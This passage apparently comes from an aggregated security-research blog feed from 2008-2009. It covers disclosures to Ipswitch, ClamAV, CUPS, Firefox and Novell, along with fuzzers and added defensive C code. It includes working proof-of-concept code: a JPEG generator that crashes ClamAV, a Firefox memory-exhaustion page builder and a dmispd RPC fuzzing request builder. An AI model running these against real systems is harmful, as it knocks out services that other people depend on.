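 * ADDROW body are assumptions.  Buffers are built, never sent. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define RPC_MSG_CALL      0
#define RPC_MSG_REPLY     1
#define RPC_VERSION       2
#define AUTH_NULL         0
#define PMAP_PROG         100000
#define PMAP_VERS         2
#define PMAP_PROC_GETPORT 3
#define PMAP_PROT_TCP     6
#define DMISPD_PROG       300598   /* from the post */
#define DMISPD_VERS       1
#define DMISPD_ADDROW     523

/* XDR encodes every integer as a 4-byte big-endian word. */
static size_t xdr_put_u32(uint8_t *buf, size_t off, uint32_t v)
{
    buf[off] = (uint8_t)(v >> 24); buf[off + 1] = (uint8_t)(v >> 16);
    buf[off + 2] = (uint8_t)(v >> 8); buf[off + 3] = (uint8_t)v;
    return off + 4;
}

static uint32_t xdr_get_u32(const uint8_t *buf, size_t off)
{
    return ((uint32_t)buf[off] << 24) | ((uint32_t)buf[off + 1] << 16) |
           ((uint32_t)buf[off + 2] << 8) | (uint32_t)buf[off + 3];
}

/* Variable-length opaque: length word, bytes, zero padding to 4 bytes. */
static size_t xdr_put_opaque(uint8_t *buf, size_t off, const uint8_t *d, uint32_t len)
{
    off = xdr_put_u32(buf, off, len);
    memcpy(buf + off, d, len);
    off += len;
    while (off % 4) buf[off++] = 0;
    return off;
}

/* Call header: xid, CALL, rpcvers, prog, vers, proc, then credential and
 * verifier, both AUTH_NULL with empty bodies.  Always 40 bytes; the
 * procedure's XDR-encoded arguments follow. */
size_t rpc_call_header(uint8_t *buf, uint32_t xid, uint32_t prog, uint32_t vers, uint32_t proc)
{
    size_t off = 0;
    off = xdr_put_u32(buf, off, xid);
    off = xdr_put_u32(buf, off, RPC_MSG_CALL);
    off = xdr_put_u32(buf, off, RPC_VERSION);
    off = xdr_put_u32(buf, off, prog);
    off = xdr_put_u32(buf, off, vers);
    off = xdr_put_u32(buf, off, proc);
    off = xdr_put_u32(buf, off, AUTH_NULL); off = xdr_put_u32(buf, off, 0); /* cred */
    off = xdr_put_u32(buf, off, AUTH_NULL); off = xdr_put_u32(buf, off, 0); /* verf */
    return off;
}

/* PMAPPROC_GETPORT(prog, vers, prot, port): port is ignored by the server. */
size_t pmap_getport_request(uint8_t *buf, uint32_t xid, uint32_t prog, uint32_t vers, uint32_t prot)
{
    size_t off = rpc_call_header(buf, xid, PMAP_PROG, PMAP_VERS, PMAP_PROC_GETPORT);
    off = xdr_put_u32(buf, off, prog);
    off = xdr_put_u32(buf, off, vers);
    off = xdr_put_u32(buf, off, prot);
    return xdr_put_u32(buf, off, 0);
}

/* dmispd ADDROW with a caller-chosen opaque body (assumed fuzzer view). */
size_t dmispd_addrow_request(uint8_t *buf, uint32_t xid, const uint8_t *body, uint32_t len)
{
    size_t off = rpc_call_header(buf, xid, DMISPD_PROG, DMISPD_VERS, DMISPD_ADDROW);
    return xdr_put_opaque(buf, off, body, len);
}

/* Over TCP every message is preceded by a record mark: high bit = last
 * fragment, low 31 bits = fragment length. */
size_t rpc_record_mark(uint8_t *buf, uint32_t msg_len)
{
    return xdr_put_u32(buf, 0, 0x80000000u | msg_len);
}

/* Reply header: xid, REPLY, MSG_ACCEPTED(0), verifier, accept_stat.
 * Returns 1 only for an accepted SUCCESS reply with the expected xid and
 * stores where the procedure's result data begins. */
int rpc_reply_ok(const uint8_t *buf, size_t len, uint32_t expect_xid, size_t *result_off)
{
    uint32_t verf_len;
    size_t off;
    if (len < 24 || xdr_get_u32(buf, 0) != expect_xid) return 0;
    if (xdr_get_u32(buf, 4) != RPC_MSG_REPLY || xdr_get_u32(buf, 8) != 0) return 0;
    verf_len = xdr_get_u32(buf, 16);
    if (verf_len > 400) return 0;                 /* MAX_AUTH_BYTES */
    off = 20 + ((verf_len + 3) & ~(size_t)3);
    if (off + 4 > len || xdr_get_u32(buf, off) != 0) return 0; /* accept_stat SUCCESS */
    *result_off = off + 4;
    return 1;
}
```

A client first sends pmap_getport_request() to UDP/TCP port 111 and reads the port out of the reply at result_off; only then does it open a connection to dmispd and write rpc_record_mark() followed by the ADDROW message. A reply whose accept_stat is PROC_UNAVAIL (3) is the cheap way to confirm which of the UNKNOWN procedure numbers are actually implemented before fuzzing them.
]]>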
<item><title>Vamos Updates</title><description>Secuobs.com : 2009-09-09 09:42:27 - Jeremy's Computer Security Blog - Lots of things have been going on, so I'm going to do a quick update on my blog now. I released 3 new exploits on 09/07/2009:

Ipswitch WS_FTP 12 Professional Remote Format String 0day PoC (nocoolnameforawsftppoc.pl). I actually got a non-robotic, insightful vendor response:

"We saw your post regarding this vulnerability and wanted to thank you for bringing it to our attention. We have been able to reproduce the issue and have identified a fix. Our (Ipswitch File Transfer Division) policy is to notify the first reporting company (via email), then after fixing, give mention to you in the Release Notes when the patch is released. You mention in your post that you tried to find a resource at Ipswitch. Can you tell me who you tried, so we can be more responsive in the future?"

Sent in response:

"Thanks for fixing the issue, please link me to the release notes when the updates are publicly issued. I attempted to go through the support procedure, but the process seemed vague when trying to report a security issue. Like most other vendors that make security a top priority, a security contact email is issued and made publicly available along with a team dedicated to fixing and responding to emails about security issues."

And then I got:

"Thanks for your response. I can see where the standard support procedure would seem vague for this purpose. I did find out (today) that we have a security@ipswitch.com email that is monitored. We'll need to do a better job of publicizing it. I'll let you know when we have a release for the fix."

GemStone/S 6.3.1 "stoned" Local Buffer Overflow Exploit (wonderfulcaricatureofexploitability.c), which is a good example of beating Linux's ASLR implementation, as discussed in a previous post.

Safari 3.2.3 (Win32) 'eval' Remote Denial of Service Exploit (letsgosurfinnowonsafari.pl). This is a bug that was in Krakow Labs' Fun Archive for a while and was fixed in Safari 4.

I just released 4f, the File Format Fuzzing Framework, at the Krakow Labs website today; you should check it out, and if you want to write modules for it there is a section explaining just how to do it. You can also check out the video graciously hosted by SecurityTube (a GREAT site) if you'd like to see 4f in action.

Also, I am working with Mozilla on a vulnerability that affects Firefox 2.x and 3.x, currently tested up to 3.6a1, which allows users to tamper with other users' downloads. You can check out the video here, and I will be releasing exploit code as soon as updates fixing the issue are provided.</description><link>http://www.secuobs.com/revue/news/139073.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/139073.shtml</guid></item>
<item><title>AniWeather Add-on Configuration Vulnerability</title><description>Secuobs.com : 2009-08-04 22:29:24 - Jeremy's Computer Security Blog - AniWeather is a very popular add-on for both Mozilla Firefox and Google's Chrome. While looking at its configuration page one day, I realized that there wasn't much protecting AniWeather's configuration. To configure AniWeather, it uses a page hosted at the AniWeather website. I copied the page and ran it as a local file; it worked the same (just keep the same filename, aniweatherconfig2.html). AniWeather was only checking whether the filename was the same, allowing anyone to host the file that does the configuration, possibly with other intentions, such as onload configuration changes that take effect when a target user visits the web page. Not a huge vulnerability, but configuration files should be protected at all times, especially from untrusted remote hosts. Kudos to the team at AniWeather: they provided a decent fix that checks the hostname and makes sure the configuration page that interacts with the add-on comes from the trusted source. Just watch out for DNS attacks now, heh.

"Thanks for reporting the vulnerability. I have upgraded the add-on and forced the host name checking. AniWeather uses a configuration page mainly to be compatible with the Google Chrome browser so that both browsers share an identical experience. Since these days updating add-ons on mozilla.org takes forever, you can get the latest version (0.69) directly from www.aniweather.com. In fact, if you are a US user, you can also enjoy a rich set of graphic reports (including hi-res radar) in the new version. Let me know if you have any further questions or comments. Thanks again and have a nice day."

It actually took them less than 2 hours to respond and upgrade AniWeather. Now if other vendors could be so efficient...</description><link>http://www.secuobs.com/revue/news/127943.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/127943.shtml</guid></item>
<item><title>iSec Advisory for Adobe</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - There is an interesting bugtraq post that iSEC has released as an advisory for Adobe Flash and AIR. From the original post:

"iSEC applied targeted fuzzing to the ActionScript 2 virtual machine used by the Adobe Flash player, and identified several issues which could lead to denial of service, information disclosure or code execution when parsing a malicious SWF file. The majority of testing occurred during 120 hours of automated SWF-specific fault injection testing in which several hundred unique control paths were identified that trigger bugs and/or potential vulnerabilities in the Adobe Flash Player. Paths leading to duplicate issues were condensed down to a number of unique problems in the Adobe Flash Player. The primary cause for these vulnerabilities appears to be simple failures in verifying the bounds of compartmentalized structures."

So, iSEC used a SWF fuzzer and found lots of bugs, including DoS, information disclosure, and code execution. Nice. But now it looks like (and I assume the fuzz strings' "oracle" is strong) most of the SWF bugs are laid to rest. Bah humbug, AND IT'S NOT EVEN CHRISTMAS YET. And 120 hours: these guys weren't just determined; I bet they also implemented a good system for spawning processes and catching faults. Good stuff. But I have to say, I respect the level of security these guys play at. Lots of goodies have been coming from iSEC, and this was a good read. Bug on.</description><link>http://www.secuobs.com/revue/news/122407.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122407.shtml</guid></item>
<item><title>Format String, Frame Pointer Literature</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I have released two new papers; both, like the previous two, are exploitation demonstrations. Local and remote examples are provided for exploiting on our host OS, Linux. Format String Exploitation (here). Frame Pointer Overwrite (here). The format string paper goes through exploiting .dtors and overwriting GOT entries, and some people may not realize the opportunities that present themselves when one is unable to control the instruction pointer (EIP) but only the frame pointer (EBP), which can still lead to control over EIP. Then it's game over. I hope everyone had a good break for the holidays; mine has been going pretty well. I have been working on my JPEG fuzzer, and so far it has gone from BETA to ALPHA testing stages. FINAL shouldn't be too far down the road, so stay tuned. If anyone is interested, there is a good SCADA mailing list that may be worth subscribing to. For more information, check it out here.</description><link>http://www.secuobs.com/revue/news/122406.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122406.shtml</guid></item>
<item><title>New Fuzzers and ClamAV Bug</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - I have released a couple of fuzzers recently, 'just for fun'. They are RSH and VNC fuzzers; check them out here and here, respectively.

Also, something interesting that I just came across:

test@ubuntu:~$ clamscan -V
ClamAV 0.94.1/8713/Tue Dec  2 14:59:31 2008

From http://securitytracker.com/alerts/2008/Dec/1021296.html:

"Version(s): prior to 0.94.2
Description: A vulnerability was reported in Clam AntiVirus. A remote user can cause denial of service conditions on the target system. A remote user can create a specially crafted JPEG file that, when processed by the target system, will trigger a stack overflow and cause the Clam AntiVirus process to crash. Ilja van Sprundel reported this vulnerability.
Impact: A remote user can create a JPEG file that, when processed by the target application, will cause the target application to crash.
Solution: The vendor has issued a fixed version (0.94.2). The vendor's advisory is available at http://sourceforge.net/project/shownotes.php?group_id=86638&amp;release_id=643134
Also reference: https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1266"

test@ubuntu:~$ cat clam.c
<![CDATA[
```c
/* clam.c: writes a JPEG made of one Photoshop (APP13) segment repeated
 * NR_ITER times.  Each copy carries a thumbnail resource (id 0x040c)
 * whose data, after the 28-byte thumbnail header, is simply the next copy,
 * so a scanner that recurses into thumbnails recurses once per copy.
 * The include lines and the body of the loop were lost when this post was
 * extracted; the loop writing crashstr NR_ITER times is restored here as
 * the evident intent, not copied from the original. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NR_ITER 200000

const char crashstr[] =
    "\xff\xd8"                       /* jpg marker */
    "\xff\xed"                       /* exif data */
    "\x00\x02"                       /* length */
    "Photoshop 3.0\x00"
    "8BIM"
    "\x04\x0c"                       /* thumbnail id */
    "\x00"
    "\x01"
    "\x01\x01\x01\x01"
    "0123456789012345678912345678";  /* skip over 28 bytes */

int main(void)
{
    FILE *fp;
    int i;

    fp = fopen("clamav-jpeg-crash.jpg", "w");
    if (!fp) {
        printf("can't open/create file\n");
        exit(1);
    }
    /* restored: one copy of the segment per iteration, without the NUL */
    for (i = 0; i < NR_ITER; i++)
        fwrite(crashstr, 1, sizeof(crashstr) - 1, fp);
    fclose(fp);
    return 0;
}
```
]]>

Excerpt from the Ubuntu clamav package changelog:

  ... 2.1+1075-0ubuntu6 for clamav-daemon and clamav-freshclam:
    - add debian/usr.bin.freshclam and debian/usr.sbin.clamd
    - debian/clamav-{daemon,freshclam}.dirs: add etc/apparmor.d/force-complain
    - debian/clamav-{daemon,freshclam}.install: install profiles
    - debian/clamav-{daemon,freshclam}.preinst: create symlink for force-complain on pre-feisty upgrades, upgrades where apparmor-profiles profile is unchanged (ie non-enforcing) and upgrades where the profile doesn't exist
    - debian/clamav-{daemon,freshclam}.postrm: remove symlink in force-complain on purge
    - debian/clamav-{daemon,freshclam}.postinst.in: reload apparmor
    - update README.Debian with note on AppArmor
  * Update apparmor profile for clamd to work with TCP sockets (LP: #288942)

 -- Scott Kitterman  Wed, 12 Nov 2008 15:20:49 -0500</description><link>http://www.secuobs.com/revue/news/122405.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122405.shtml</guid></item>
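<![CDATA[
The defensive counterpart to clam.c, as an added example that is neither the post's code nor ClamAV's: a walker for the nested-thumbnail layout the PoC emits, with a hard recursion limit. Each copy of the segment is a JPEG whose APP13 segment holds one 8BIM thumbnail resource, and the thumbnail data after its 28-byte header is the next copy, so an unbounded parser recurses once per copy; with NR_ITER = 200000 that exhausts the stack, which is the "stack overflow" the advisory describes. The walker locates the "Photoshop 3.0" signature right after the APP13 marker and length, as the PoC assumes a target does (the PoC's declared length of 2 would otherwise end the segment immediately); that assumption, MAX_THUMB_DEPTH and the function names are mine. It returns the nesting depth, or -1 once the limit is exceeded.

```c
/* Added example: bounded walk over the nested Photoshop thumbnails that
 * clam.c above produces.  Not from the post and not ClamAV's parser;
 * MAX_THUMB_DEPTH and the signature-based segment handling are assumptions. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define MAX_THUMB_DEPTH 16
#define PS_SIG          "Photoshop 3.0"
#define PS_SIG_LEN      14            /* includes the terminating NUL */
#define THUMB_HDR_LEN   28            /* the "skip over 28 bytes" header */

/* Constructed sample input: the same 60-byte segment clam.c writes. */
static const uint8_t poc_segment[] =
    "\xff\xd8\xff\xed\x00\x02" "Photoshop 3.0\x00" "8BIM" "\x04\x0c" "\x00" "\x01"
    "\x01\x01\x01\x01" "0123456789012345678912345678";
#define POC_SEGMENT_LEN (sizeof(poc_segment) - 1)

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

static int walk(const uint8_t *p, size_t len, int depth)
{
    size_t off;
    if (depth > MAX_THUMB_DEPTH) return -1;            /* the bound doing the work */
    /* SOI, APP13 marker, 2-byte length, then the Photoshop signature */
    if (len < 4 + 2 + PS_SIG_LEN) return depth;        /* truncated: nothing nested */
    if (p[0] != 0xff || p[1] != 0xd8 || p[2] != 0xff || p[3] != 0xed) return depth;
    off = 6;
    if (memcmp(p + off, PS_SIG, PS_SIG_LEN) != 0) return depth;
    off += PS_SIG_LEN;
    /* 8BIM image resource blocks: sig, id, pascal name (even-padded), size, data */
    while (off + 12 <= len && memcmp(p + off, "8BIM", 4) == 0) {
        uint16_t id;
        size_t namelen, size;
        off += 4;
        id = (uint16_t)((p[off] << 8) | p[off + 1]);
        off += 2;
        namelen = p[off];
        off += 1 + namelen + ((namelen + 1) % 2);
        if (off + 4 > len) return depth;
        size = be32(p + off);
        off += 4;
        if (size > len - off) size = len - off;        /* never trust the declared size */
        if (id == 0x040c) {
            if (size <= THUMB_HDR_LEN) return depth;   /* no embedded JPEG left */
            return walk(p + off + THUMB_HDR_LEN, size - THUMB_HDR_LEN, depth + 1);
        }
        off += size + (size % 2);
    }
    return depth;
}

/* Depth of thumbnail nesting in a JPEG buffer, or -1 beyond MAX_THUMB_DEPTH. */
int thumbnail_nesting_depth(const uint8_t *jpeg, size_t len)
{
    return walk(jpeg, len, 1);
}

/* Builds the PoC layout in memory: `copies` concatenated segments. */
size_t build_nested(uint8_t *out, size_t cap, int copies)
{
    size_t n = 0;
    while (copies-- > 0 && n + POC_SEGMENT_LEN <= cap) {
        memcpy(out + n, poc_segment, POC_SEGMENT_LEN);
        n += POC_SEGMENT_LEN;
    }
    return n;
}
```

Two things carry the protection: the declared resource size is clamped to the bytes actually present, and the recursion stops at a fixed depth instead of at end of input. A real scanner would additionally make the limit a loop counter rather than recursion, but the check is the same.
]]>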
<item><title>CUPS of tea, Heil Hibernation</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - You know, I have a lot of respect for developers. They write code, whatever the quality may be, and they help us out more than we know. But too often they put themselves into funny situations when discussing security bugs. It's like they can't believe the experts. Regarding the latest CUPS integer overflow information (http://www.cups.org/str.php?L2974):

iljavs (Ilja Van Sprundel): "in _cupsImageReadPNG() the following calculation is made:
<![CDATA[
```c
bufsize = img->xsize * img->ysize * 3;
if ((bufsize / (img->ysize * 3)) != img->xsize)
{
  fprintf(stderr, "DEBUG: PNG image dimensions (%ux%u) too large!\n",
          (unsigned)width, (unsigned)height);
  fclose(fp);
  return (1);
}
```
]]>
there is a potential integer overflow in the validation code that could render the whole validation useless: (img->ysize * 3) on itself could overflow."

mike (Developer): "The maximum dimensions of an image are 2^27-1, so it is impossible for (img->ysize * 3) to overflow a 32-bit integer. See the range checks prior to the buffer size check."

One day later, mike (Developer): "Reopening since IMAGE_MAX_HEIGHT is 2^31-1, not 2^27-1. Patch attached that fixes it."

I thought that was very interesting myself. No disrespect to the CUPS team or any developer out there, but please believe us security researchers; it's what we do. You write code, and even if you happen to write sub-par code, we sometimes help you fix it (and complain every once in a while, I know). If we are nice enough to help you out with a security bug, be it big or small, please polish it with some consideration and/or respect.

Also, I thought I'd throw this into this blog post. Besides the fact that you need restarts and shutdowns to modify or complete certain maintenance on a computer, shouldn't that be secondary to the default task of powering down our workstations? I find hibernation much more efficient and much quicker. You don't even need to keep the PC powered for hibernation; it powers down just like shutdown but boots up twice as fast. Just something to think about (until those guys from ASUS get the hyper booting technology out of testing, haha). In other news, I've started writing for SecuriTeam Blogs, which is pretty cool so far. No worries though, I'll still be writing for this site, and regardless of finals (oh boy), I've still been working on projects and I have a special one to release soon. Stay tuned. Ladies and gentlemen, everything is going to be great.</description><link>http://www.secuobs.com/revue/news/122404.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122404.shtml</guid></item>
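<![CDATA[
The arithmetic in that CUPS exchange, as an added example that is not from the post or from CUPS: the original two-line check, modelled in 32-bit unsigned arithmetic so the wrap is well defined (CUPS used int, where the overflow is undefined behaviour, which only makes things worse), beside a check that tests each factor against the quotient before multiplying. The function names, the IMAGE_MAX_* values and the sample dimensions are mine; the post only says CUPS caps the height at 2^31-1. With ysize = 0x55555556, ysize*3 wraps to 2, so the original check divides by 2 and happily accepts a 2-byte buffer for a 1 x 1431655766 image, which is then written with xsize*ysize*3 bytes of pixel data.

```c
/* Added example: the CUPS size check above versus a check that cannot be
 * bypassed by overflow.  Not CUPS code; names and caps are assumptions. */
#include <stdint.h>
#include <stddef.h>

#define IMAGE_MAX_WIDTH  ((uint32_t)0x7fffffff)   /* assumed: 2^31-1, as for the height */
#define IMAGE_MAX_HEIGHT ((uint32_t)0x7fffffff)

/* The original check.  Unsigned so the wraparound is well defined.
 * Returns 1 if the dimensions are accepted and stores the buffer size
 * that would be allocated. */
int png_bufsize_vuln(uint32_t xsize, uint32_t ysize, uint32_t *out)
{
    uint32_t bufsize;
    if (ysize == 0) return 0;                 /* the real range checks exclude 0 */
    bufsize = xsize * ysize * 3;              /* may wrap */
    if ((bufsize / (ysize * 3)) != xsize)     /* ysize * 3 may wrap as well */
        return 0;
    *out = bufsize;
    return 1;
}

/* Hardened: reject out-of-range dimensions first, then check each
 * multiplication against the largest value that cannot overflow. */
int png_bufsize_safe(uint32_t xsize, uint32_t ysize, uint32_t *out)
{
    uint32_t rowbytes;
    if (xsize == 0 || ysize == 0) return 0;
    if (xsize > IMAGE_MAX_WIDTH || ysize > IMAGE_MAX_HEIGHT) return 0;
    if (xsize > UINT32_MAX / 3) return 0;      /* xsize * 3 would wrap */
    rowbytes = xsize * 3;
    if (ysize > UINT32_MAX / rowbytes) return 0; /* rowbytes * ysize would wrap */
    *out = rowbytes * ysize;
    return 1;
}
```

The division-based test in the original is only sound when its own divisor is known not to have wrapped; the hardened version never forms a product before proving it fits, which is the property the range caps alone failed to provide once IMAGE_MAX_HEIGHT allowed values above UINT32_MAX / 3.
]]>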
<item><title>JPEG Fuzzer has ARRIVED</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - 1) What exactly is JPEGfuzr?
JPEGfuzr is a Perl implementation of fuzzing JPEG metadata through the Image::MetaData::JPEG extension. It supports 40 metadata tags and fuzzes them all, one by one, using the fuzz data supplied.

2) Who may be interested in JPEGfuzr?
Security researchers, software vendors, programmers, curious eyes, or basically anyone that wants to research the JPEG file format or find bugs in JPEG implementations.

3) How do I use JPEGfuzr?
You must first define a target. A target application can most likely be anything that works with JPEG files and reads their metadata. After defining a target, you just need a JPEG file that jpegfuzr can use and modify for fuzzing purposes, which I have included in test/. Simply set -s for the sleep time in between fuzz cases and, technically, you're ready to go.

Usage: jpegfuzr.pl -t [target] -z [jpeg file] -s [sleep seconds]
Example: jpegfuzr.pl -t /usr/bin/iview -z test.jpeg -s 2

You can also use kill.sh to kill off the processes that jpegfuzr doesn't. JPEGfuzr also uses 2nd generation fuzz strings like those in rshatter and vncrush. Demo screenshots: see the post. You can grab a copy yourself HERE (or from any of the above links via the keyword 'jpegfuzr'). It's time to go out and find your own 0days. Make it, work it, own it. Have fun.</description><link>http://www.secuobs.com/revue/news/122403.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122403.shtml</guid></item>
<item><title>Holidays' Break Research</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - Well, it's that time of the year again: the holidays are upon us. A well-deserved break from college has given me plenty of time to work on personal and work-related research as well. While making good friends with the night and usually sleeping in the day, I've got much work done on some projects that I feel will bring good results. Memory leaks and other bugs have been bridged and battered, which has led me to believe that there are problems not just in big- or small-name applications, but often in the libraries they use. As you should know, vulnerabilities in a library open up a lot of possibilities. In most cases, if an application uses a vulnerable function in a vulnerable library, the bug can be triggered in the application, unless there are other circumstances or prevention methods. THIS IS GOLDEN.

That being said, an interesting situation I found myself in when fuzzing an application that uses glib (glade, pango, etc.), and that also happened to contain many bugs of its own, including integer overflows, at least one with the possibility of corrupting memory in escalation to a heap overflow, was that it showed me some potential for creating denial of service conditions. Having the application process certain types of data, even in no particular parsing form, broke the application:

GLib-ERROR **: /build/buildd/glib2.0-2.18.2/glib/gmem.c:175: failed to allocate 2684354560 bytes
aborting...

Program received signal SIGABRT, Aborted.
[Switching to Thread 0xb6d00720 (LWP 19767)]
0xb7fd6430 in __kernel_vsyscall ()
(gdb) bt
#0  0xb7fd6430 in __kernel_vsyscall ()
#1  0xb73a9880 in raise () from /lib/tls/i686/cmov/libc.so.6
#2  0xb73ab248 in abort () from /lib/tls/i686/cmov/libc.so.6
#3  0xb756d90c in g_logv () from /usr/lib/libglib-2.0.so.0
#4  0xb756d946 in g_log () from /usr/lib/libglib-2.0.so.0
#5  0xb756bca6 in g_realloc () from /usr/lib/libglib-2.0.so.0
#6  0xb77095a9 in pango_glyph_string_set_size () from /usr/lib/libpango-1.0.so.0
#7  0xb6b2be3e in ?? () from /usr/lib/pango/1.6.0/modules/pango-basic-fc.so
#8  0xb770ffba in ?? () from /usr/lib/libpango-1.0.so.0
#9  0xb77232fa in pango_shape () from /usr/lib/libpango-1.0.so.0
#10 0xb7714e82 in ?? () from /usr/lib/libpango-1.0.so.0
#11 0xb7715891 in ?? () from /usr/lib/libpango-1.0.so.0
#12 0xb77175fc in ?? () from /usr/lib/libpango-1.0.so.0
#13 0xb771879b in ?? () from /usr/lib/libpango-1.0.so.0
#14 0xb771a3ee in pango_layout_get_pixel_extents () from /usr/lib/libpango-1.0.so.0
#15 0xb771a45a in pango_layout_get_pixel_size () from /usr/lib/libpango-1.0.so.0
#16 0x08086eac in nsfont_width ()
#17 0x080a77bc in ?? ()
#18 0x080a747d in ?? ()
#19 0x080a747d in ?? ()
#20 0x080ab3f0 in layout_document ()
#21 0x0809f073 in html_reformat ()
#22 0x080a0d95 in html_convert ()
#23 0x0805980c in content_convert ()
#24 0x0805cc49 in ?? ()
#25 0x0805a6c1 in fetch_send_callback ()
#26 0x08060c23 in ?? ()
#27 0x0806110f in ?? ()
#28 0x0805afe9 in fetch_poll ()
#29 0x08088276 in gui_poll ()
#30 0x0807fe94 in main ()

Looking at the glib error message and some source code (and playing with it even more), it is throwing errors from g_malloc() and g_realloc(). Is glib as solid as everyone has hoped? No sir.

Firefox also has some memory issues. During the beginning stages of testing, I noticed it crashed several times just by getting it to eat some pages that made it process huge amounts of data. I will now release one of the more _reliable_ bugs (play with it on XP; r0ut3r confirmed it works OK on Vista though):
<![CDATA[
```perl
#!/usr/bin/perl
# Firefox location.hash memory-exhaustion trigger from the post.  The HTML
# wrapper tags in $head and $foot were stripped when the post was extracted
# and are restored here as a plain html/body wrapper.
use strict;
use warnings;

my $filename = $ARGV[0];
if (!defined $filename) {
    print "Usage: $0 <file>\n\n";
    exit 1;
}

my $head = "<html>\n<body>\n";
my $trig = "<script>location.hash = '" . ("A" x 20000000) . "';</script>\n";
my $foot = "</body>\n</html>\n";
my $data = $head . $trig . $foot;

open(my $fh, '>', $filename) or die "can't open $filename: $!";
print $fh $data;
close($fh);
exit 0;
```
]]>
Also, location.hash is actually fun to play with. A Mozilla crash reporter is more likely to show up if you're already running applications that use a lot of memory, or you notice your Firefox is frozen and start clicking around. But if you like, play with the trigger and you might irritate the average browser (both kinds of them) even more. Who knows, maybe 'Improved Memory Management' will make it onto the release notes of 3.1. Also, something important to note is that all the Firefox-related browsers (Mozilla, Flock, IceCat, Madfox, Pogo, SeaMonkey, Songbird) don't just share the good but, depending on the situation, the bad too. The bugs cannot hide anymore.</description><link>http://www.secuobs.com/revue/news/122402.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122402.shtml</guid></item>
<item><title>New Year Research</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - As 2008 ends and 2009 begins, I hope everyone will have a fun and safe holiday celebration. 2008, for a lot of people, certainly could have been better, but we all should have confidence that 2009 will bring many better and greater things. I myself have several research goals and hope to continue my education and a happy, healthy lifestyle.

I was ActiveX fuzzing on random computers again (haha) and got a funny crash in wscript on Vista while fuzzing Microsoft Money 2006. This is not the first time fuzzing has made wscript.exe have 'errors'. C:\Program Files\Microsoft Money 2006\MNYCoreFiles\prtstb06.dll: setting 'Startup' to 0 seems to pull the trigger. ACCESS VIOLATION: MOV ECX, [ESI+30].

I was looking through the current exploits for the XML buffer overflow in Internet Explorer and some old skylined code and decided to code one that hits up a bindshell on Vista SP1, so I did. The core concepts and exploitation techniques came from other available code by skylined, muts and krafty; thanks go to them. My Win32 smashing techniques are limited but always improving, so sorry if the code is off or not up to par.

I have discovered a memory leak in libxul. Libxul provides an API for XUL apps and Gecko embedders, and Gecko of course is the rendering engine of many Mozilla products, including Firefox, and also of lots of other browsers. The effect of triggering this bug may not be a crash or fault, but a huge memory allocation. It has, in my tests and others', consumed the target browser, rendering it unusable. Safari also hits an error in WebKit when processing fuzz data. Code for libxul and WebKit is available now.

bf2 (Browser Fuzzer 2), the next generation development of my earlier work (bf, Browser Fuzzer), has been quite busy. Not all of the bugs it uncovers will be public or discussed here, but many will. Browser Fuzzer 2 has been completely redesigned and rewritten to cover huge bases. It fuzzes CSS, DOM, HTML, and JavaScript. It has been a product of many hours of R&amp;D and strong motivation. It has ripped through nearly every browser available. I am undecided as to when it will be released, if I release it at all.</description><link>http://www.secuobs.com/revue/news/122401.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/122401.shtml</guid></item>
<item><title>JBrownSEC Changes, Code</title><description>Secuobs.com : 2009-07-20 01:29:02 - Jeremy's Computer Security Blog - As you might have noticed, there have been some changes to JBrownSEC lately. I want to thank Stashbox for hosting our files, which are available through the right sidebar along with other news and information feeds. I hope these new additions and other slight changes benefit all the readers out there; I know I sure like them. I have also released some exploits recently, including some memory leaks in Konqueror and a remote code execution for 3Com's old TFTP server, for fun. You also might have to play with the data amount on the 'link href' leak on Konqueror to make it less likely to recover, if at all. NetSurf also has some integer overflows and memory leaks in its rendering engine and such; the advisory and exploits are available now (check your favorite security site and/or the right-side info panel).

A while back I discovered an XSS-turned-command-execution exploit (utilizing WScript, so not very reliable) for Novell NetWare's Remote Manager. Sometime thereafter I received an email from someone at Novell asking to work with me concerning this flaw. I would have helped more than I did, but at the time of my email my NetWare server was down or something happened, so I wasn't very helpful. Long email short, the person asking for information about the bug claimed that they could not reproduce it and, I suppose, dismissed it (I think they were using NetWare 6.5 SP7 and the bug was tested on my 6.5 SP6 server). But the bug is real: you can actually inject code for some session-wide action in the target browser. I was also fuzzing a version of ICEbrowser, the browser that Novell uses for Remote Manager and web surfing in general, and found that I could trigger a fault and actually reboot the system. Note that this exploit is not completely reliable; it has shown signs of being fatal to the health of the server if continually faulted and rebooted over and over again.

Abend 1 on P00: Server-5.70.06: Page Fault Processor Exception (Error code 00000000)

Registers:
    CS = 0008 DS = 0010 ES = 0010 FS = 0010 GS = 007B SS = 0010
    EAX = 00000000 EBX = 9687EF4C ECX = 004EB8F0 EDX = 000000E4
    ESI = 00000000 EDI = 00000001 EBP = 8D9E7F3C ESP = 86179EF4
    EIP = 00000000 FLAGS = 00010086
    Access Location: 0x00000000

Running process: Interrupt service routine, nested count 2
Interrupted process: Server 12 Process
Thread Owned by NLM: SERVER.NLM
Stack pointer: 86179F60
OS Stack limit: 86172020
CPU 0 (Thread 89D24220) is in a NO SLEEP state
Scheduling priority: 67371008
Wait state: 50500F0 (Waiting for work)
Stack:
    002048F1   (SERVER.NLM|PerformCallOuts+105)
